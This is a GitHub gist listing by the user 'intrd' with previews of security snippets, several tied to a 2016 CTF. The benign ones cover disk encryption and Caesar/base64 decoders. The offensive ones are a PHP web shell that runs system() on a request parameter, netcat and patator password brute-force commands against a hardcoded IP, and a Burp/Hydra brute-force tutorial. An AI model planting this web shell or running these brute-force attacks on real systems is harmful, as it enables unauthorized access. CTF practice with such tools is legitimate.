Skip to content

Instantly share code, notes, and snippets.

View intrd's full-sized avatar
💭
Things do not change, we change (silently).

intrd

💭
Things do not change, we change (silently).
86 followers · 73 following
View GitHub Profile
@intrd
intrd / tutorial_disk_encryption.txt
Last active April 26, 2023 12:26
Tutorial - Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
## Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
# @author intrd - http://dann.com.br/
Why not full disk encryption?
this setup is for systems who need performace..
experienced on ubuntu system w/ an existing user..
as root:
# apt-get install ecryptfs-utils cryptsetup
# apt-get install lsof
@intrd
intrd / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Last active June 27, 2023 15:57
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
@intrd
intrd / base64_caesar.py
Last active March 3, 2017 06:03
Caesar base64(rotn) visual bruteforce
## Caesar base64(rotn) visual bruteforce
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import base64, string
def caesar_int(ch, shift):
n = ord(ch)
if ord('a') <= n <= ord('z'):
n = n - ord('a')
@intrd
intrd / int_netcat.py
Last active August 8, 2017 15:45
intrd's netcat python socket
## intrd's netcat python socket (v1.1)
# @author intrd - http://dann.com.br/ (original: http://stackoverflow.com/a/36419867)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import socket, socks, time
class Netcat:
def __init__(self, ip, port, timeo=10, scks=False):
self.buff = ""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@intrd
intrd / tutorial_kali_autologin_afterupdate.txt
Last active January 28, 2024 06:32
Kali light xfce4 root autologin (works after lightdm update)
## Kali light xfce4 root autologin (works after lightdm update)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
Root autologin is broken after lighdtdm update, fix by doing this:
nano /etc/lightdm/lightdm.conf
at [Seat:*] group uncomment/edit:
autologin-user=root
autologin-user-timeout=0
@intrd
intrd / int_caesar.py
Last active March 3, 2017 06:02
Caesar script used in crypto100-hotsun @ 3dsctf-2k16
## Caesar script used in crypto100-hotsun @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import base64, string
def int_caesar(ch, shift):
n = ord(ch)
if ord('a') <= n <= ord('z'):
n = n - ord('a')
@intrd
intrd / nc_bruteforce.sh
Last active June 28, 2022 08:41
Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
#!/bin/bash
## Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
for letter in {A..Z} ; do
echo $letter
sleep 1
(echo "yes" & sleep 1 & echo "$letter") | nc -i1 -w5 54.175.35.248 8002
done
@intrd
intrd / mapos_bf.sh
Last active March 3, 2017 06:02
Mapos patator bruteforce script used in web200-mapos @ 3dsctf-2k16
## Mapos patator bruteforce script used in web200-mapos @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# patator.py - https://github.com/lanjelot/patator
python ~/appz/patator/patator.py http_fuzz url="http://54.175.35.248:8008/index.php/mapos/verificarLogin?ajax=true" \
method=POST body='email=admin%40admin.com&senha=FILE0' 0=~/dics/rockyou.txt \
follow=0 accept_cookie=1 --threads=2 \
-x quit:fgrep!="Disallowed Key Characters.",fgrep!='esult":false' -l data --max-retries=5 --start=3000
@intrd
intrd / php_backdoor.php
Last active October 16, 2021 13:12
PHP backdoor used in web200-mapos @ 3dsctf-2k16
## PHP backdoor used in web200-mapos @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;
@intrd
intrd / base3200.py
Last active March 3, 2017 06:01
base64x50 decoder used in misc100-base3200 @ 3dsctf-2k16
## base64x50 decoder used in misc100-base3200 @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import base64
# 3200/64 = 50
pontfile='msg.txt'
for x in range(0, 50):
with open(pontfile, 'r') as f: